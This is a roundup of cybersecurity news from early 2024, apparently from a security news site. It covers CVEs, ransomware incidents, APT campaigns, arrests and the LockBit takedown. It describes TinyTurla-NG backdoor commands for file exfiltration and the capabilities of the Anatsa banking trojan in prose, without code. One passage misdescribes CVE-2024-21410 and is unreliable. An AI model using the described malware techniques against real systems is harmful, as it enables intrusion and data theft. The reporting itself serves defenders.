CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:
CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing him to open it.
Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.
A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.
The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.
Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtYpic.twitter.com/x3lskKmBRi
The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.
The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.
The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.
At this time it’s unclear which kind of information was exposed, however, Yoon’s office pointed out that threat actors did compromise the overall office’s security system.
“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”
South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.
North Korea-linked APT groups are also known to be focused on attacks against crypto exchange and financial organizations in South Korea.
Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.
On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta.
On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.
VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.
The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.
The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.
“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”
Impacted production plants are in Germany, Romania and Indonesia, on February 14 the operations at the plants were still blocked.
“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.
At this time, no known ransomware group has claimed responsibility for the attack.
The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.
A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.
The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.
“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”
The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers, it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.
The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021, in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products. Since September 2022, Moobot botnet was spotted targeting vulnerable D-Link routers.
In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.
The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.
“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”
According to court documents, the government extensively tested the operation on the relevant Ubiquiti Edge OS routers. The DoJ pointed out that apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing factory resets of their routers or accessing their routers through the local network.
Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.
Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.
Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.
TinyTurla-NG was spotted in early December 2023, it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.
“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.
Talos also discovered previously undetected PowerShell dubbed “TurlaPower-NG ” that was designed for data exfiltration. Turla operators used the scripts to exfiltrate keys used to secure the password databases of popular password management software.
The cybersecurity firm identified three different TinyTurla-NG samples, and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that that campaign may have begun as early as November 2023.
Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. Threat actors compromised the websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2. The attackers uploaded PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.
Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.
Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.
The malware supports the following commands:
“changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
“changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
“get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
“post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
“killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat.
The report includes indicators of compromise (IoCs).
U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.
CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.
The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor compromised network administrator credentials through the account of a former employee that was used to successfully authenticate to an internal virtual private network (VPN) access point. Then the attackers made lateral movement and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The government organization also hosts its sensitive data on an Azure environment which was not accessed by the attackers.
“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.
The threat actor likely obtained the employee’s account credentials from a third-party data breach.
The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.
CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.
Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.
The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.
CISA did not attribute the attack to a specific threat actor.
The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.
The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.
This additional reward aims to target affiliated and initial access brokers involved and that facilitated the attacks of the group.
On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.
On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.
On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.
The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol.
“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Guttingen.” reads the message published by law enforcement on the seized websites.
“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.
The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.
The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.
“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”
According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.
People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion.
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.
CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability
The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.
The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.
“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.
The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.
The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.
In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco Cisco ASA and FTD appliances.
“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.
An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.
The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in Cisco Anyconnect SSL VPN was the entry point in at least six of the compromised devices.
“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.
The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.
“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”
On October 2022, Swiss police arrested Penchukov in Geneva, also known as Tank, which is one of the leaders of the JabberZeus cybercrime group.
The man was extradited to the United States in 2023, he was included in the FBI’s “Most Wanted” list and has been sought for 10 years.
In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as JabberZeus crew. JabberZeus was a small cybercriminal ring that was targeting SMBs with a custom-made version of the Zeus banking trojan. At the time, DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules and received alerts once a bank account had been compromised.
The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, was and told him Miloslava birth weight.
Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.
Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections. The late son of former Ukrainian President Victor Yanukovych would serve as godfather to Tank’s daughter Miloslava.
Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced to two years and ten months of incarceration in May 2015 followed by a supervised release of 1 year.
Since May 2019, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID or Bokbot.
Penchukov faces up to 20 years in prison for each count, he is scheduled to be sentenced on May 9.
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.
Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.
Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.
ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.
The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.
“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.
ESET is not aware of attacks in the wild exploiting this vulnerability.
Below is the list of impacted programs and versions:
ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
ESET File Security for Microsoft Azure (all versions)
The cybersecurity firm has released patches to address the issues in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, File Security for Microsoft Azure.
The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.
The company recommended customers patch their products as soon as possible.
Vulnerabilities in security solutions are very dangerous because these issues are difficult to detect and because these software solutions run with high privileges.
In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.
SolarWinds addressed three critical vulnerabilities in its Access Rights Manager (ARM) solution, including two RCE bugs.
SolarWinds has fixed several Remote Code Execution (RCE) vulnerabilities in its Access Rights Manager (ARM) solution.
Access Rights Manager (ARM) is a software solution designed to assist organizations in managing and monitoring access rights and permissions within their IT infrastructure. This type of tool is crucial for maintaining security, compliance, and efficient administration of user access to various resources, systems, and data.
Below is the list of flaws addressed by the company:
The three critical remote code execution flaws are:
CVE-2023-40057 (CVSS score 9.0): A deserialization of untrusted data issue. An authenticated user can exploit this vulnerability to abuse a SolarWinds service resulting in remote code execution.
CVE-2024-23479 (CVSS score 9.6): A Directory Traversal Remote Code Execution Vulnerability. An unauthenticated user can exploit this issue to achieve the Remote Code Execution.
CVE-2024-23476 (CVSS score 9.6) Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve the Remote Code Execution.
SolarWinds made the headlines in 2020, when Russia-linked APT group carried out a supply chain attack that compromised the Orion software provided by the company.
Resecurity has identified an increasing trend of cryptocurrency counterfeiting, the experts found several tokens impersonating major brands, government organizations and national fiat currencies.
Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection for Fortune 100 companies by cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies.
As in any other booming industry, the decentralized finance (DeFi) and crypto space has attracted its fair share of scammers and bad actors. These individuals seek to lure investors into fake projects known as rug pulls, only to abscond with their funds.
A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates.
Besides scamming, bad actors also released misinformation about new countries joining the alliance, which didn’t confirm their membership. This is a great example of how bad actors capitalize on geopolitical narratives to profit from investment scams. Likely, unverified news stating BRICS countries adopting a gold-backed money to compete with the US dollar and Euro inspired bad actors with this idea which later transitioned into creative crypto-scam.
Leveraging a global international umbrella of the organization, fraudsters launched an initial coin offering (ICO) promoting the fake token offering various rewards.
This type of fraud was prominently observed on platforms such as Lobstr.co, which allows the creation of tokens on the Stellar network. Due to their flexibility in allowing users to offer their own tokens for trading, such platforms are especially susceptible to exploitation by cybercriminals.
The common fraudulent tactics they employ include ‘cryptocurrency counterfeiting’, where scammers create tokens with names like those of legitimate ones, and the aforementioned ‘rug pulls’.
As for today, the token was still available for trading attracting victims:
The offer already generated some interest and led to first victims:
Resecurity warns Internet users to perform due diligence of new cryptocurrency offerings and contact your local regulators to make sure they are legitimate.
Resecurity has identified and reported similar cryptocurrency counterfeit tokens promoted at the same platform impersonating:
one of the major oil corporations
national financial regulator
national currency
major real estate development
Some of these scams involved misleading information referencing Monetary Authority of Singapore and Central Bank of one of the countries in the Middle East.
According to Solidus Labs, ‘rug pull’ scams have defrauded over 2 million investors, surpassing the number of victims from major crypto failures like FTX, Celsius, and Voyager.
These scams typically manifest in two forms:
DeFi scams involve altering a token’s smart contract to defraud investors. Tactics used include making the token unsellable, enabling the creation of an unlimited number of new tokens, or imposing high trading fees
Exit scams are characterized by extensive promotion of a token, followed by the scammers betraying investors. Methods include creating fake marketing websites, announcing non-existent partnerships, or using bots for wash trading.
The low barrier to entry for executing these scams makes them accessible to a broad range of malicious actors, eliminating the need for advanced programming skills. Utilizing platforms like Stellar to create misleadingly named tokens is a common strategy in these ‘rug pulls’.
The cryptocurrency landscape faces significant challenges in combating such fraudulent activities, highlighting the urgent need for increased vigilance and more robust regulatory frameworks.
More details are included in the analysis published by Resecurity:
An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations.
Researchers from Recorded Future’s Insikt Group identified a cyberespionage campaign carried out by an APT group, tracked as TAG-70, linked to Belarus and Russia. The nation-state actors are known to carry out cyber-espionage against targeting government, military, and national infrastructure entities in Europe and Central Asia since at least December 2020.
Between October and December 2023, TAG-70 exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers in attacks aimed at over 80 organizations, primarily in Georgia, Poland, and Ukraine.
“TAG70 has demonstrated a high level of sophistication in its attack methods. The threat actors leveraged social engineering techniques and exploited cross-site scripting vulnerabilities in Roundcube webmail servers to gain unauthorized access to targeted mail servers, successfully bypassing the defenses of government and military organizations.” reads the report published Recorded Future’s Insikt Group.
The researchers noticed similarities between this campaign and other activities conducted by other Russia-linked groups, such as BlueDelta (APT28) and Sandworm. These APT groups previously targeted email solutions, including Roundcube and Zimbra.
The compromise of email servers poses a substantial risk, especially during a conflict such as Russia-Ukraine. Threat actors can target email servers to gather intelligence about adversaries’ war efforts, diplomatic relationships, and coalition partnerships.
The attacks aimed at Iranian embassies in Russia and the Netherlands demonstrate a broader geopolitical interest in assessing Iran’s diplomatic activities, particularly its support for Russia in the context of the Ukrainian conflict. Similarly, the espionage against Georgian government entities reflects an interest in monitoring Georgia’s pursuits to access the European Union (EU) and NATO.
On July 27, 2023, the researchers a malicious JavaScript that was acting as a second-stage loader used by TAG70 previous to the exploitation of Roundcube issue. ESET researchers also detailed the same attack chain.
The JavaScript is loaded through cross-site scripting (XSS) from a malicious email and it decoded a Base64-encoded JavaScript payload (jsBodyBase64). Then the payload is inserted into the Document Object Model (DOM) of the Roundcube webpage within a newly created script tag.
The researchers recommend reading the detailed analysis of the recent TAG-70 campaign here.
The Raccoon Infostealer operator, Mark Sokolovsky, was extradited to the US from the Netherlands to appear in a US court.
In October 2020, the US Justice Department charged a Ukrainian national, Mark Sokolovsky (28), with computer fraud for allegedly infecting millions of computers with the Raccoon Infostealer.
The man was held in the Netherlands, and he was charged for his alleged role in the international cybercrime operation known as Raccoon Infostealer. He appealed the decision of a Dutch Court for granting his extradition to the United States, but it was finally extradited to the US from the Netherlands to appear in a US court.
The Raccoon stealer was first spotted in April 2019, it was designed to steal victims’ credit card data, email credentials, cryptocurrency wallets, and other sensitive data.
Raccoon is offered for sale as a malware-as-a-service (MaaS) that implements an easy-to-use automated backend panel, operators also offer bulletproof hosting and 24/7 customer support in both Russian and English. The price of the Raccoon service is $200 per month to use.
The Raccoon stealer is written in C++ by Russian-speaking developers who initially promoted it exclusively on Russian-speaking hacking forums. The malware is now promoted on English-speaking hacking forums, it works on both 32-bit and 64-bit operating systems.
The analysis of the logs for sale in the underground community allowed the experts to estimate that Raccoon infected over 100,000 users worldwide at the time of its discovery.
The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email client like Thunderbird, Outlook, and Foxmail.
Dutch authorities arrested Sokolovsky in March 2022, concurrent with his arrest, the FBI and law enforcement partners in Italy and the Netherlands dismantled the C2 infrastructure used by the Raccoon Infostealer operation.
FBI identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data. While the exact number of victims has yet to be verified, experts believe that millions of potential victims around the world were targeted by the operation.
The credentials appear to include over four million email addresses. The United States does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.
Sokolovsky is charged with computer fraud, wire fraud, money laundering and aggravated identity theft.
Sokolovsky faces a maximum penalty of 20 years in prison for the wire fraud and money laundering offenses, five years for the conspiracy to commit computer fraud charge, and a mandatory consecutive two-year term for the aggravated identity theft offense.
He appeared in a US court on February 9 and is currently awaiting trial.
The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia.
In November 2023, researchers from ThreatFabric observed a resurgence of the Anatsa banking Trojan, aka TeaBot and Toddler. Between November and February, the experts observed five distinct waves of attacks, each focusing on different regions.
The malware previously focused its activities on the UK, Germany, and Spain, but the latest campaigns targeted Slovakia, Slovenia, and Czechia, which suggests a shift in its operational strategy.
The researchers classified Anatsa’s activity as “targeted,” threat actors were observed focusing on 3-5 regions at a time. According to ThreatFabric, the dropper applications were uploaded on Google Play in the targeted regions. The attackers noticed that the applications often reached the Top-3 in the “Top New Free” category, in an attempt to trick users into believing that the application was legitimate and downloaded by a large number of users.
“Throughout this campaign, Anatsa’s Modus Operandi has evolved, displaying more sophisticated tactics such as AccessibilityService abuse, a multi-staged infection process, and the ability to bypass Android 13’s restricted settings.” reads the report published by ThreatFabric.
The researchers pointed out that some of the droppers successfully exploited the accessibility service and bypassed Google Play’s enhanced detection and protection mechanisms.
The avoid detection, the droppers adopted a multi-staged methodology, dynamically retrieving configuration and malicious executable files from their C2 server.
“All droppers in this campaign have demonstrated the capability to bypass the restricted settings for accessibility service in Android 13.” continues the report.
The experts observed five droppers in the latest campaign with over 100,000 total installations.
Anatsa was first detected by the Italian cybersecurity firm Cleafy in March 2021 while it was targeting banks in Spain, Germany, Italy, Belgium, and the Netherlands.
TeaBot supports common features of Android banking Trojan and like other similar malware families it abuses Accessibility Services. Below is a list of features implemented by the malware:
Ability to perform Overlay Attacks against multiple bank applications to steal login credentials and credit card information
Ability to send / intercept / hide SMS messages
Enabling keylogging functionalities
Ability to steal Google Authentication codes
Ability to obtain full remote control of an Android device (via Accessibility Services and realtime screen-sharing)
The Anatsa banking Trojan allows operators to take over the infected devices and execute actions on a victim’s behalf.
“Effective detection and monitoring of malicious applications, along with observing unusual customer account behaviour, are crucial for identifying and investigating potential fraud cases linked to device-takeover mobile malware like Anatsa.” concludes the report.
Below a statement sent by Google spokesperson to Security Affairs:
“All of the apps identified in the report have been removed from Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.”
An international law enforcement operation codenamed ‘Operation Cronos’ led to the disruption of the LockBit ransomware operation.
A joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries has disrupted the LockBit ransomware operation.
Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”
The Operation Cronos operation is still ongoing and NCA’s announced that more information will be published tomorrow, February 20, 2024.
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, Working in close cooperation with the FBI and the international law enforcement task force, Operation Cronos,” the banner reads.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation.”
vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.
Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd
LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.
According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.
The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric.
The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric.
Schneider Electric is a multinational company that specializes in energy management, industrial automation, and digital transformation.
